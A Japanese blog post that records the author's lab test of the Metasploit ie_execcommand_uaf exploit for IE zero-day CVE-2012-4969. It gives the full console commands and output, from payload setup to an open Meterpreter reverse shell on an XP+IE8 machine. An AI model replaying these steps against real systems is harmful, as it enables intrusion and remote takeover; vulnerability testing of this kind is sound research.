2012年9月20日木曜日

CVE-2012-4969 0-day exploit for IE 7, 8 & 9 on Windows XP, Vista, and 7

9月18日に報告されたIEの脆弱性
http://isc.sans.edu/diary/IE+Zero+Day+is+For+Real+/14107
http://jvn.jp/cert/JVNVU480095/index.html

9月21日には修正パッチがリリースされるとのこと
http://www.ipa.go.jp/security/ciadr/vul/20120920-windows.html

Metasploit のモジュールとしても提供されていたので確認してみる

https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit

http://www.metasploit.com/modules/exploit/windows/browser/ie_execcommand_uaf

以下、XP+IE8 での検証結果

msf >
msf > use exploit/windows/browser/ie_execcommand_uaf
msf  exploit(ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ie_execcommand_uaf) > show options

Module options (exploit/windows/browser/ie_execcommand_uaf):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on th
e local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly gene
rated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted:
SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ie_execcommand_uaf) > srvhost 192.168.1.84
[-] Unknown command: srvhost.
msf  exploit(ie_execcommand_uaf) > set srvhost 192.168.1.84
srvhost => 192.168.1.84
msf  exploit(ie_execcommand_uaf) > set lhost 192.168.1.84
lhost => 192.168.1.84
msf  exploit(ie_execcommand_uaf) > set srvport 80
srvport => 80
msf  exploit(ie_execcommand_uaf) > set lport 8080
lport => 8080
msf  exploit(ie_execcommand_uaf) > set uripath test
uripath => test
msf  exploit(ie_execcommand_uaf) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.84:8080
[*] Using URL: http://192.168.1.84:80/test
[*] Server started.
msf  exploit(ie_execcommand_uaf) > [*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible
; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath
.1)
[*] 192.168.1.51    ie_execcommand_uaf - Redirecting to Pjeam.html
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51    ie_execcommand_uaf - Loading Pjeam.html
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51    ie_execcommand_uaf - Loading VKxmjc.html
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] Sending stage (752128 bytes) to 192.168.1.51
[*] Meterpreter session 1 opened (192.168.1.84:8080 -> 192.168.1.51:2725) at 2012-09-20 22:30:40 +
0900
[*] Session ID 1 (192.168.1.84:8080 -> 192.168.1.51:2725) processing InitialAutoRunScript 'migrate
 -f'
[*] Current server process: iexplore.exe (11744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 11780
[+] Successfully migrated to process
msf  exploit(ie_execcommand_uaf) >
msf  exploit(ie_execcommand_uaf) >
とりあえずは成功
他にもいくつか試してみたが、うまく行かない場合もあった
成功率はJAVAのほうがよさそうな印象